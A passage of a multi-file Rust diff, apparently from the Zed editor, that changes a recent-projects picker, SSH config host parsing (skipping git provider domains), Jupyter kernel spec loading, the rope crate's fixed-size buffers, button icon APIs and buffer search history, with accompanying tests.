+ DateTime<Utc>,
+ )>,
+ ) {
+ self.has_any_non_local_projects = workspaces
+ .iter()
+ .any(|(_, location, _, _)| !matches!(location, SerializedWorkspaceLocation::Local));
+ self.workspaces = workspaces;
+ }
+}
+
+impl EventEmitter<DismissEvent> for SidebarRecentProjectsDelegate {}
+
+impl PickerDelegate for SidebarRecentProjectsDelegate {
+ type ListItem = AnyElement;
+
+ fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc<str> {
+ "Search recent projects…".into()
+ }
+
+ fn render_editor(
+ &self,
+ editor: &Arc<dyn ErasedEditor>,
+ window: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) -> Div {
+ h_flex()
+ .flex_none()
+ .h_9()
+ .px_2p5()
+ .justify_between()
+ .border_b_1()
+ .border_color(cx.theme().colors().border_variant)
+ .child(editor.render(window, cx))
+ }
+
+ fn match_count(&self) -> usize {
+ self.filtered_workspaces.len()
+ }
+
+ fn selected_index(&self) -> usize {
+ self.selected_index
+ }
+
+ fn set_selected_index(
+ &mut self,
+ ix: usize,
+ _window: &mut Window,
+ _cx: &mut Context<Picker<Self>>,
+ ) {
+ self.selected_index = ix;
+ }
+
+ fn update_matches(
+ &mut self,
+ query: String,
+ _: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) -> Task<()> {
+ let query = query.trim_start();
+ let smart_case = query.chars().any(|c| c.is_uppercase());
+ let is_empty_query = query.is_empty();
+
+ let current_workspace_id = self
+ .workspace
+ .upgrade()
+ .and_then(|ws| ws.read(cx).database_id());
+
+ let candidates: Vec<_> = self
+ .workspaces
+ .iter()
+ .enumerate()
+ .filter(|(_, (id, _, _, _))| {
+ Some(*id) != current_workspace_id && !self.sibling_workspace_ids.contains(id)
+ })
+ .map(|(id, (_, _, paths, _))| {
+ let combined_string = paths
+ .ordered_paths()
+ .map(|path| path.compact().to_string_lossy().into_owned())
+ .collect::<Vec<_>>()
+ .join("");
+ StringMatchCandidate::new(id, &combined_string)
+ })
+ .collect();
+
+ if is_empty_query {
+ self.filtered_workspaces = candidates
+ .into_iter()
+ .map(|candidate| StringMatch {
+ candidate_id: candidate.id,
+ score: 0.0,
+ positions: Vec::new(),
+ string: candidate.string,
+ })
+ .collect();
+ } else {
+ let mut matches = smol::block_on(fuzzy::match_strings(
+ &candidates,
+ query,
+ smart_case,
+ true,
+ 100,
+ &Default::default(),
+ cx.background_executor().clone(),
+ ));
+ matches.sort_unstable_by(|a, b| {
+ b.score
+ .partial_cmp(&a.score)
+ .unwrap_or(std::cmp::Ordering::Equal)
+ .then_with(|| a.candidate_id.cmp(&b.candidate_id))
+ });
+ self.filtered_workspaces = matches;
+ }
+
+ self.selected_index = 0;
+ Task::ready(())
+ }
+
+ fn confirm(&mut self, _secondary: bool, window: &mut Window, cx: &mut Context<Picker<Self>>) {
+ let Some(hit) = self.filtered_workspaces.get(self.selected_index) else {
+ return;
+ };
+ let Some((_, location, candidate_workspace_paths, _)) =
+ self.workspaces.get(hit.candidate_id)
+ else {
+ return;
+ };
+
+ let Some(workspace) = self.workspace.upgrade() else {
+ return;
+ };
+
+ match location {
+ SerializedWorkspaceLocation::Local => {
+ if let Some(handle) = window.window_handle().downcast::<MultiWorkspace>() {
+ let paths = candidate_workspace_paths.paths().to_vec();
+ cx.defer(move |cx| {
+ if let Some(task) = handle
+ .update(cx, |multi_workspace, window, cx| {
+ multi_workspace.open_project(paths, window, cx)
+ })
+ .log_err()
+ {
+ task.detach_and_log_err(cx);
+ }
+ });
+ }
+ }
+ SerializedWorkspaceLocation::Remote(connection) => {
+ let mut connection = connection.clone();
+ workspace.update(cx, |workspace, cx| {
+ let app_state = workspace.app_state().clone();
+ let replace_window = window.window_handle().downcast::<MultiWorkspace>();
+ let open_options = OpenOptions {
+ replace_window,
+ ..Default::default()
+ };
+ if let RemoteConnectionOptions::Ssh(connection) = &mut connection {
+ crate::RemoteSettings::get_global(cx)
+ .fill_connection_options_from_settings(connection);
+ };
+ let paths = candidate_workspace_paths.paths().to_vec();
+ cx.spawn_in(window, async move |_, cx| {
+ open_remote_project(connection.clone(), paths, app_state, open_options, cx)
+ .await
+ })
+ .detach_and_prompt_err(
+ "Failed to open project",
+ window,
+ cx,
+ |_, _, _| None,
+ );
+ });
+ }
+ }
+ cx.emit(DismissEvent);
+ }
+
+ fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context<Picker<Self>>) {}
+
+ fn no_matches_text(&self, _window: &mut Window, _cx: &mut App) -> Option<SharedString> {
+ let text = if self.workspaces.is_empty() {
+ "Recently opened projects will show up here"
+ } else {
+ "No matches"
+ };
+ Some(text.into())
+ }
+
+ fn render_match(
+ &self,
+ ix: usize,
+ selected: bool,
+ window: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) -> Option<Self::ListItem> {
+ let hit = self.filtered_workspaces.get(ix)?;
+ let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?;
+
+ let ordered_paths: Vec<_> = paths
+ .ordered_paths()
+ .map(|p| p.compact().to_string_lossy().to_string())
+ .collect();
+
+ let tooltip_path: SharedString = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ let host = options.display_name();
+ if ordered_paths.len() == 1 {
+ format!("{} ({})", ordered_paths[0], host).into()
+ } else {
+ format!("{}\n({})", ordered_paths.join("\n"), host).into()
+ }
+ }
+ _ => ordered_paths.join("\n").into(),
+ };
+
+ let mut path_start_offset = 0;
+ let match_labels: Vec<_> = paths
+ .ordered_paths()
+ .map(|p| p.compact())
+ .map(|path| {
+ let (label, path_match) =
+ highlights_for_path(path.as_ref(), &hit.positions, path_start_offset);
+ path_start_offset += path_match.text.len();
+ label
+ })
+ .collect();
+
+ let prefix = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ Some(SharedString::from(options.display_name()))
+ }
+ _ => None,
+ };
+
+ let highlighted_match = HighlightedMatchWithPaths {
+ prefix,
+ match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "),
+ paths: Vec::new(),
+ };
+
+ let icon = icon_for_remote_connection(match location {
+ SerializedWorkspaceLocation::Local => None,
+ SerializedWorkspaceLocation::Remote(options) => Some(options),
+ });
+
+ Some(
+ ListItem::new(ix)
+ .toggle_state(selected)
+ .inset(true)
+ .spacing(ListItemSpacing::Sparse)
+ .child(
+ h_flex()
+ .gap_3()
+ .flex_grow()
+ .when(self.has_any_non_local_projects, |this| {
+ this.child(Icon::new(icon).color(Color::Muted))
+ })
+ .child(highlighted_match.render(window, cx)),
+ )
+ .tooltip(Tooltip::text(tooltip_path))
+ .into_any_element(),
+ )
+ }
+
+ fn render_footer(&self, _: &mut Window, cx: &mut Context<Picker<Self>>) -> Option<AnyElement> {
+ let focus_handle = self.focus_handle.clone();
+
+ Some(
+ v_flex()
+ .flex_1()
+ .p_1p5()
+ .gap_1()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ .child({
+ let open_action = workspace::Open {
+ create_new_window: false,
+ };
+ Button::new("open_local_folder", "Add Local Project")
+ .key_binding(KeyBinding::for_action_in(&open_action, &focus_handle, cx))
+ .on_click(move |_, window, cx| {
+ window.dispatch_action(open_action.boxed_clone(), cx)
+ })
+ })
+ .into_any(),
+ )
+ }
+}
@@ -1,60 +1,116 @@
use std::collections::BTreeSet;
+const FILTERED_GIT_PROVIDER_HOSTNAMES: &[&str] = &[
+ "dev.azure.com",
+ "bitbucket.org",
+ "chromium.googlesource.com",
+ "codeberg.org",
+ "gitea.com",
+ "gitee.com",
+ "github.com",
+ "gist.github.com",
+ "gitlab.com",
+ "sourcehut.org",
+ "git.sr.ht",
+];
+
pub fn parse_ssh_config_hosts(config: &str) -> BTreeSet<String> {
- let mut hosts = BTreeSet::new();
- let mut needs_another_line = false;
+ parse_host_blocks(config)
+ .into_iter()
+ .flat_map(HostBlock::non_git_provider_hosts)
+ .collect()
+}
+
+struct HostBlock {
+ aliases: BTreeSet<String>,
+ hostname: Option<String>,
+}
+
+impl HostBlock {
+ fn non_git_provider_hosts(self) -> impl Iterator<Item = String> {
+ let hostname = self.hostname;
+ let hostname_ref = hostname.as_deref().map(is_git_provider_domain);
+ self.aliases
+ .into_iter()
+ .filter(move |alias| !hostname_ref.unwrap_or_else(|| is_git_provider_domain(alias)))
+ }
+}
+
+fn parse_host_blocks(config: &str) -> Vec<HostBlock> {
+ let mut blocks = Vec::new();
+ let mut aliases = BTreeSet::new();
+ let mut hostname = None;
+ let mut needs_continuation = false;
+
for line in config.lines() {
let line = line.trim_start();
- if let Some(line) = line.strip_prefix("Host") {
- match line.chars().next() {
- Some('\\') => {
- needs_another_line = true;
- }
- Some('\n' | '\r') => {
- needs_another_line = false;
- }
- Some(c) if c.is_whitespace() => {
- parse_hosts_from(line, &mut hosts);
- }
- Some(_) | None => {
- needs_another_line = false;
- }
- };
-
- if needs_another_line {
- parse_hosts_from(line, &mut hosts);
- needs_another_line = line.trim_end().ends_with('\\');
- } else {
- needs_another_line = false;
+
+ if needs_continuation {
+ needs_continuation = line.trim_end().ends_with('\\');
+ parse_hosts(line, &mut aliases);
+ continue;
+ }
+
+ let Some((keyword, value)) = split_keyword_and_value(line) else {
+ continue;
+ };
+
+ if keyword.eq_ignore_ascii_case("host") {
+ if !aliases.is_empty() {
+ blocks.push(HostBlock { aliases, hostname });
+ aliases = BTreeSet::new();
+ hostname = None;
}
- } else if needs_another_line {
- needs_another_line = line.trim_end().ends_with('\\');
- parse_hosts_from(line, &mut hosts);
- } else {
- needs_another_line = false;
+ parse_hosts(value, &mut aliases);
+ needs_continuation = line.trim_end().ends_with('\\');
+ } else if keyword.eq_ignore_ascii_case("hostname") {
+ hostname = value.split_whitespace().next().map(ToOwned::to_owned);
}
}
- hosts
+ if !aliases.is_empty() {
+ blocks.push(HostBlock { aliases, hostname });
+ }
+
+ blocks
}
-fn parse_hosts_from(line: &str, hosts: &mut BTreeSet<String>) {
+fn parse_hosts(line: &str, hosts: &mut BTreeSet<String>) {
hosts.extend(
line.split_whitespace()
+ .map(|field| field.trim_end_matches('\\'))
.filter(|field| !field.starts_with("!"))
.filter(|field| !field.contains("*"))
+ .filter(|field| *field != "\\")
.filter(|field| !field.is_empty())
.map(|field| field.to_owned()),
);
}
+fn split_keyword_and_value(line: &str) -> Option<(&str, &str)> {
+ let keyword_end = line.find(char::is_whitespace).unwrap_or(line.len());
+ let keyword = &line[..keyword_end];
+ if keyword.is_empty() {
+ return None;
+ }
+
+ let value = line[keyword_end..].trim_start();
+ Some((keyword, value))
+}
+
+fn is_git_provider_domain(host: &str) -> bool {
+ let host = host.to_ascii_lowercase();
+ FILTERED_GIT_PROVIDER_HOSTNAMES.contains(&host.as_str())
+}
+
#[cfg(test)]
mod tests {
use super::*;
+ use indoc::indoc;
#[test]
fn test_thank_you_bjorn3() {
- let hosts = "
+ let hosts = indoc! {"
Host *
AddKeysToAgent yes
UseKeychain yes
@@ -67,19 +123,20 @@ mod tests {
User not_me
Host something
- HostName whatever.tld
+ HostName whatever.tld
- Host linux bsd host3
- User bjorn
+ Host linux bsd host3
+ User bjorn
- Host rpi
- user rpi
- hostname rpi.local
+ Host rpi
+ user rpi
+ hostname rpi.local
- Host \
- somehost \
- anotherhost
- Hostname 192.168.3.3";
+ Host \\
+ somehost \\
+ anotherhost
+ Hostname 192.168.3.3
+ "};
let expected_hosts = BTreeSet::from_iter([
"something".to_owned(),
@@ -93,4 +150,68 @@ mod tests {
assert_eq!(expected_hosts, parse_ssh_config_hosts(hosts));
}
+
+ #[test]
+ fn filters_git_provider_domains_from_hostname() {
+ let hosts = indoc! {"
+ Host github-personal
+ HostName github.com
+
+ Host gitlab-work
+ HostName GITLAB.COM
+
+ Host local
+ HostName example.com
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter(["local".to_owned()]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
+
+ #[test]
+ fn falls_back_to_host_when_hostname_is_absent() {
+ let hosts = indoc! {"
+ Host github.com bitbucket.org keep-me
+ User git
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter(["keep-me".to_owned()]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
+
+ #[test]
+ fn does_not_fuzzy_match_host_aliases() {
+ let hosts = indoc! {"
+ Host GitHub GitLab Bitbucket GITHUB github
+ User git
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter([
+ "Bitbucket".to_owned(),
+ "GITHUB".to_owned(),
+ "GitHub".to_owned(),
+ "GitLab".to_owned(),
+ "github".to_owned(),
+ ]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
+
+ #[test]
+ fn uses_hostname_before_host_filtering() {
+ let hosts = indoc! {"
+ Host github.com keep-me
+ HostName example.com
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter(["github.com".to_owned(), "keep-me".to_owned()]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
}
@@ -2028,7 +2028,6 @@ async fn test_remote_external_agent_server(
.get_command(
HashMap::from_iter([("OTHER_VAR".into(), "other-val".into())]),
None,
- None,
&mut cx.to_async(),
)
})
@@ -431,10 +431,11 @@ impl PickerDelegate for KernelPickerDelegate {
.gap_4()
.child(
Button::new("kernel-docs", "Kernel Docs")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::End)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| cx.open_url(KERNEL_DOCS_URL)),
)
.into_any(),
@@ -503,11 +503,11 @@ pub fn python_env_kernel_specifications(
});
#[allow(unused_mut)]
- let mut kernel_specs: Vec<KernelSpecification> = futures::future::join_all(kernelspecs)
- .await
- .into_iter()
- .flatten()
- .collect();
+ let mut kernel_specs: Vec<KernelSpecification> = futures::stream::iter(kernelspecs)
+ .buffer_unordered(4)
+ .filter_map(|x| async move { x })
+ .collect::<Vec<_>>()
+ .await;
#[cfg(target_os = "windows")]
if kernel_specs.is_empty() && !is_remote {
@@ -1117,10 +1117,11 @@ impl NotebookEditor {
worktree_id,
Button::new("kernel-selector", kernel_name.clone())
.label_size(LabelSize::Small)
- .icon(status_icon)
- .icon_size(IconSize::Small)
- .icon_color(status_color)
- .icon_position(IconPosition::Start),
+ .start_icon(
+ Icon::new(status_icon)
+ .size(IconSize::Small)
+ .color(status_color),
+ ),
Tooltip::text(format!(
"Kernel: {} ({}). Click to change.",
kernel_name,
@@ -32,6 +32,7 @@ pub struct ReplStore {
kernel_specifications_for_worktree: HashMap<WorktreeId, Vec<KernelSpecification>>,
active_python_toolchain_for_worktree: HashMap<WorktreeId, SharedString>,
remote_worktrees: HashSet<WorktreeId>,
+ fetching_python_kernelspecs: HashSet<WorktreeId>,
_subscriptions: Vec<Subscription>,
}
@@ -66,6 +67,7 @@ impl ReplStore {
selected_kernel_for_worktree: HashMap::default(),
active_python_toolchain_for_worktree: HashMap::default(),
remote_worktrees: HashSet::default(),
+ fetching_python_kernelspecs: HashSet::default(),
};
this.on_enabled_changed(cx);
this
@@ -140,6 +142,10 @@ impl ReplStore {
project: &Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<()>> {
+ if !self.fetching_python_kernelspecs.insert(worktree_id) {
+ return Task::ready(Ok(()));
+ }
+
let is_remote = project.read(cx).is_remote();
// WSL does require access to global kernel specs, so we only exclude remote worktrees that aren't WSL.
// TODO: a better way to handle WSL vs SSH/remote projects,
@@ -149,7 +155,7 @@ impl ReplStore {
.map_or(false, |opts| {
matches!(opts, RemoteConnectionOptions::Wsl(_))
});
- let kernel_specifications = python_env_kernel_specifications(project, worktree_id, cx);
+ let kernel_specifications_task = python_env_kernel_specifications(project, worktree_id, cx);
let active_toolchain = project.read(cx).active_toolchain(
ProjectPath {
worktree_id,
@@ -160,9 +166,15 @@ impl ReplStore {
);
cx.spawn(async move |this, cx| {
- let kernel_specifications = kernel_specifications
- .await
- .context("getting python kernelspecs")?;
+ let kernel_specifications_res = kernel_specifications_task.await;
+
+ this.update(cx, |this, _cx| {
+ this.fetching_python_kernelspecs.remove(&worktree_id);
+ })
+ .ok();
+
+ let kernel_specifications =
+ kernel_specifications_res.context("getting python kernelspecs")?;
let active_toolchain_path = active_toolchain.await.map(|toolchain| toolchain.path);
@@ -12,7 +12,7 @@ workspace = true
path = "src/rope.rs"
[dependencies]
-arrayvec = "0.7.1"
+heapless.workspace = true
log.workspace = true
rayon.workspace = true
sum_tree.workspace = true
@@ -1,5 +1,5 @@
use crate::{OffsetUtf16, Point, PointUtf16, TextSummary, Unclipped};
-use arrayvec::ArrayString;
+use heapless::String as ArrayString;
use std::{cmp, ops::Range};
use sum_tree::Bias;
use unicode_segmentation::GraphemeCursor;
@@ -29,7 +29,7 @@ pub struct Chunk {
newlines: Bitmap,
/// If bit[i] is set, then the character at index i is an ascii tab.
tabs: Bitmap,
- pub text: ArrayString<MAX_BASE>,
+ pub text: ArrayString<MAX_BASE, u8>,
}
#[inline(always)]
@@ -47,7 +47,11 @@ impl Chunk {
#[inline(always)]
pub fn new(text: &str) -> Self {
- let text = ArrayString::from(text).unwrap();
+ let text = {
+ let mut buf = ArrayString::new();
+ buf.push_str(text).unwrap();
+ buf
+ };
const CHUNK_SIZE: usize = 8;
@@ -118,7 +122,7 @@ impl Chunk {
self.chars_utf16 |= slice.chars_utf16 << base_ix;
self.newlines |= slice.newlines << base_ix;
self.tabs |= slice.tabs << base_ix;
- self.text.push_str(slice.text);
+ self.text.push_str(slice.text).unwrap();
}
#[inline(always)]
@@ -137,9 +141,9 @@ impl Chunk {
self.newlines = slice.newlines | (self.newlines << shift);
self.tabs = slice.tabs | (self.tabs << shift);
- let mut new_text = ArrayString::<MAX_BASE>::new();
- new_text.push_str(slice.text);
- new_text.push_str(&self.text);
+ let mut new_text = ArrayString::<MAX_BASE, u8>::new();
+ new_text.push_str(slice.text).unwrap();
+ new_text.push_str(&self.text).unwrap();
self.text = new_text;
}
@@ -4,7 +4,7 @@ mod point;
mod point_utf16;
mod unclipped;
-use arrayvec::ArrayVec;
+use heapless::Vec as ArrayVec;
use rayon::iter::{IntoParallelIterator, ParallelIterator as _};
use std::{
cmp, fmt, io, mem,
@@ -184,7 +184,7 @@ impl Rope {
return self.push_large(text);
}
// 16 is enough as otherwise we will hit the branch above
- let mut new_chunks = ArrayVec::<_, NUM_CHUNKS>::new();
+ let mut new_chunks = ArrayVec::<_, NUM_CHUNKS, u8>::new();
while !text.is_empty() {
let mut split_ix = cmp::min(chunk::MAX_BASE, text.len());
@@ -192,7 +192,7 @@ impl Rope {
split_ix -= 1;
}
let (chunk, remainder) = text.split_at(split_ix);
- new_chunks.push(chunk);
+ new_chunks.push(chunk).unwrap();
text = remainder;
}
self.chunks
@@ -699,6 +699,10 @@ impl<'a> Cursor<'a> {
self.offset,
end_offset
);
+ assert!(
+ end_offset <= self.rope.len(),
+ "cannot summarize past end of rope"
+ );
self.chunks.seek_forward(&end_offset, Bias::Right);
self.offset = end_offset;
@@ -711,6 +715,10 @@ impl<'a> Cursor<'a> {
self.offset,
end_offset
);
+ assert!(
+ end_offset <= self.rope.len(),
+ "cannot summarize past end of rope"
+ );
let mut slice = Rope::new();
if let Some(start_chunk) = self.chunks.item() {
@@ -741,6 +749,10 @@ impl<'a> Cursor<'a> {
self.offset,
end_offset
);
+ assert!(
+ end_offset <= self.rope.len(),
+ "cannot summarize past end of rope"
+ );
let mut summary = D::zero(());
if let Some(start_chunk) = self.chunks.item() {
@@ -15,7 +15,7 @@ use picker::{Picker, PickerDelegate};
use platform_title_bar::PlatformTitleBar;
use release_channel::ReleaseChannel;
use rope::Rope;
-use settings::Settings;
+use settings::{ActionSequence, Settings};
use std::rc::Rc;
use std::sync::Arc;
use std::sync::atomic::AtomicBool;
@@ -1159,10 +1159,11 @@ impl RulesLibrary {
Button::new("new-rule", "New Rule")
.full_width()
.style(ButtonStyle::Outlined)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(Box::new(NewRule), cx);
}),
@@ -1398,6 +1399,13 @@ impl Render for RulesLibrary {
v_flex()
.id("rules-library")
.key_context("RulesLibrary")
+ .on_action(
+ |action_sequence: &ActionSequence, window: &mut Window, cx: &mut App| {
+ for action in &action_sequence.0 {
+ window.dispatch_action(action.boxed_clone(), cx);
+ }
+ },
+ )
.on_action(cx.listener(|this, &NewRule, window, cx| this.new_rule(window, cx)))
.on_action(
cx.listener(|this, &DeleteRule, window, cx| {
@@ -31,6 +31,7 @@ futures.workspace = true
gpui.workspace = true
language.workspace = true
menu.workspace = true
+multi_buffer.workspace = true
project.workspace = true
serde.workspace = true
serde_json.workspace = true
@@ -6,8 +6,9 @@ use crate::{
ToggleCaseSensitive, ToggleRegex, ToggleReplace, ToggleSelection, ToggleWholeWord,
buffer_search::registrar::WithResultsOrExternalQuery,
search_bar::{
- ActionButtonState, alignment_element, filter_search_results_input, input_base_styles,
- render_action_button, render_text_input,
+ ActionButtonState, HistoryNavigationDirection, alignment_element,
+ filter_search_results_input, input_base_styles, render_action_button, render_text_input,
+ should_navigate_history,
},
};
use any_vec::AnyVec;
@@ -15,6 +16,7 @@ use collections::HashMap;
use editor::{
Editor, EditorSettings, MultiBufferOffset, SplittableEditor, ToggleSplitDiff,
actions::{Backtab, FoldAll, Tab, ToggleFoldAll, UnfoldAll},
+ scroll::Autoscroll,
};
use futures::channel::oneshot;
use gpui::{
@@ -337,13 +339,11 @@ impl Render for BufferSearchBar {
};
let query_column = input_style
- .child(
- div()
- .flex_1()
- .min_w(px(0.))
- .overflow_hidden()
- .child(render_text_input(&self.query_editor, color_override, cx)),
- )
+ .child(div().flex_1().min_w_0().py_1().child(render_text_input(
+ &self.query_editor,
+ color_override,
+ cx,
+ )))
.child(
h_flex()
.flex_none()
@@ -484,39 +484,42 @@ impl Render for BufferSearchBar {
.child(query_column)
.child(mode_column);
- let replace_line =
- should_show_replace_input.then(|| {
- let replace_column = input_base_styles(replacement_border)
- .child(render_text_input(&self.replacement_editor, None, cx));
- let focus_handle = self.replacement_editor.read(cx).focus_handle(cx);
-
- let replace_actions = h_flex()
- .min_w_64()
- .gap_1()
- .child(render_action_button(
- "buffer-search-replace-button",
- IconName::ReplaceNext,
- Default::default(),
- "Replace Next Match",
- &ReplaceNext,
- focus_handle.clone(),
- ))
- .child(render_action_button(
- "buffer-search-replace-button",
- IconName::ReplaceAll,
- Default::default(),
- "Replace All Matches",
- &ReplaceAll,
- focus_handle,
- ));
+ let replace_line = should_show_replace_input.then(|| {
+ let replace_column = input_base_styles(replacement_border).child(
+ div()
+ .flex_1()
+ .py_1()
+ .child(render_text_input(&self.replacement_editor, None, cx)),
+ );
+ let focus_handle = self.replacement_editor.read(cx).focus_handle(cx);
+
+ let replace_actions = h_flex()
+ .min_w_64()
+ .gap_1()
+ .child(render_action_button(
+ "buffer-search-replace-button",
+ IconName::ReplaceNext,
+ Default::default(),
+ "Replace Next Match",
+ &ReplaceNext,
+ focus_handle.clone(),
+ ))
+ .child(render_action_button(
+ "buffer-search-replace-button",
+ IconName::ReplaceAll,
+ Default::default(),
+ "Replace All Matches",
+ &ReplaceAll,
+ focus_handle,
+ ));
- h_flex()
- .w_full()
- .gap_2()
- .when(has_collapse_button, |this| this.child(alignment_element()))
- .child(replace_column)
- .child(replace_actions)
- });
+ h_flex()
+ .w_full()
+ .gap_2()
+ .when(has_collapse_button, |this| this.child(alignment_element()))
+ .child(replace_column)
+ .child(replace_actions)
+ });
let mut key_context = KeyContext::new_with_defaults();
key_context.add("BufferSearchBar");
@@ -831,13 +834,13 @@ impl BufferSearchBar {
cx: &mut Context<Self>,
) -> Self {
let query_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
+ let mut editor = Editor::auto_height(1, 4, window, cx);
editor.set_use_autoclose(false);
editor
});
cx.subscribe_in(&query_editor, window, Self::on_query_editor_event)
.detach();
- let replacement_editor = cx.new(|cx| Editor::single_line(window, cx));
+ let replacement_editor = cx.new(|cx| Editor::auto_height(1, 4, window, cx));
cx.subscribe(&replacement_editor, Self::on_replacement_editor_event)
.detach();
@@ -973,7 +976,9 @@ impl BufferSearchBar {
if deploy.focus {
let mut handle = self.query_editor.focus_handle(cx);
let mut select_query = true;
- if deploy.replace_enabled && handle.is_focused(window) {
+
+ let has_seed_text = self.query_suggestion(window, cx).is_some();
+ if deploy.replace_enabled && has_seed_text {
handle = self.replacement_editor.focus_handle(cx);
select_query = false;
};
@@ -1186,6 +1191,7 @@ impl BufferSearchBar {
let len = query_buffer.len(cx);
query_buffer.edit([(MultiBufferOffset(0)..len, query)], None, cx);
});
+ query_editor.request_autoscroll(Autoscroll::fit(), cx);
});
self.set_search_options(options, cx);
self.clear_matches(window, cx);
@@ -1704,15 +1710,19 @@ impl BufferSearchBar {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Next, cx) {
+ cx.propagate();
+ return;
+ }
+
if let Some(new_query) = self
.search_history
.next(&mut self.search_history_cursor)
.map(str::to_string)
{
drop(self.search(&new_query, Some(self.search_options), false, window, cx));
- } else {
- self.search_history_cursor.reset();
- drop(self.search("", Some(self.search_options), false, window, cx));
+ } else if let Some(draft) = self.search_history_cursor.take_draft() {
+ drop(self.search(&draft, Some(self.search_options), false, window, cx));
}
}
@@ -1722,6 +1732,11 @@ impl BufferSearchBar {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Previous, cx) {
+ cx.propagate();
+ return;
+ }
+
if self.query(cx).is_empty()
&& let Some(new_query) = self
.search_history
@@ -1732,9 +1747,10 @@ impl BufferSearchBar {
return;
}
+ let current_query = self.query(cx);
if let Some(new_query) = self
.search_history
- .previous(&mut self.search_history_cursor)
+ .previous(&mut self.search_history_cursor, ¤t_query)
.map(str::to_string)
{
drop(self.search(&new_query, Some(self.search_options), false, window, cx));
@@ -2716,13 +2732,13 @@ mod tests {
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
- // Next history query after the latest should set the query to the empty string.
+ // Next history query after the latest should preserve the current query.
search_bar.update_in(cx, |search_bar, window, cx| {
search_bar.next_history_query(&NextHistoryQuery, window, cx);
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "");
+ assert_eq!(search_bar.query(cx), "c");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
search_bar.update_in(cx, |search_bar, window, cx| {
@@ -2730,17 +2746,17 @@ mod tests {
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "");
+ assert_eq!(search_bar.query(cx), "c");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
- // First previous query for empty current query should set the query to the latest.
+ // Previous query should navigate backwards through history.
search_bar.update_in(cx, |search_bar, window, cx| {
search_bar.previous_history_query(&PreviousHistoryQuery, window, cx);
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "c");
+ assert_eq!(search_bar.query(cx), "b");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
@@ -2750,7 +2766,7 @@ mod tests {
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "b");
+ assert_eq!(search_bar.query(cx), "a");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
@@ -2831,11 +2847,71 @@ mod tests {
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "");
+ assert_eq!(search_bar.query(cx), "ba");
assert_eq!(search_bar.search_options, SearchOptions::NONE);
});
}
+ #[perf]
+ #[gpui::test]
+ async fn test_search_query_history_autoscroll(cx: &mut TestAppContext) {
+ let (_editor, search_bar, cx) = init_test(cx);
+
+ // Add a long multi-line query that exceeds the editor's max
+ // visible height (4 lines), then a short query.
+ let long_query = "line1\nline2\nline3\nline4\nline5\nline6";
+ search_bar
+ .update_in(cx, |search_bar, window, cx| {
+ search_bar.search(long_query, None, true, window, cx)
+ })
+ .await
+ .unwrap();
+ search_bar
+ .update_in(cx, |search_bar, window, cx| {
+ search_bar.search("short", None, true, window, cx)
+ })
+ .await
+ .unwrap();
+
+ // Navigate back to the long entry. Since "short" is single-line,
+ // the history navigation is allowed.
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ search_bar.previous_history_query(&PreviousHistoryQuery, window, cx);
+ });
+ cx.background_executor.run_until_parked();
+ search_bar.update(cx, |search_bar, cx| {
+ assert_eq!(search_bar.query(cx), long_query);
+ });
+
+ // The cursor should be scrolled into view despite the content
+ // exceeding the editor's max visible height.
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ let snapshot = search_bar
+ .query_editor
+ .update(cx, |editor, cx| editor.snapshot(window, cx));
+ let cursor_row = search_bar
+ .query_editor
+ .read(cx)
+ .selections
+ .newest_display(&snapshot)
+ .head()
+ .row();
+ let scroll_top = search_bar
+ .query_editor
+ .update(cx, |editor, cx| editor.scroll_position(cx).y);
+ let visible_lines = search_bar
+ .query_editor
+ .read(cx)
+ .visible_line_count()
+ .unwrap_or(0.0);
+ let scroll_bottom = scroll_top + visible_lines;
+ assert!(
+ (cursor_row.0 as f64) < scroll_bottom,
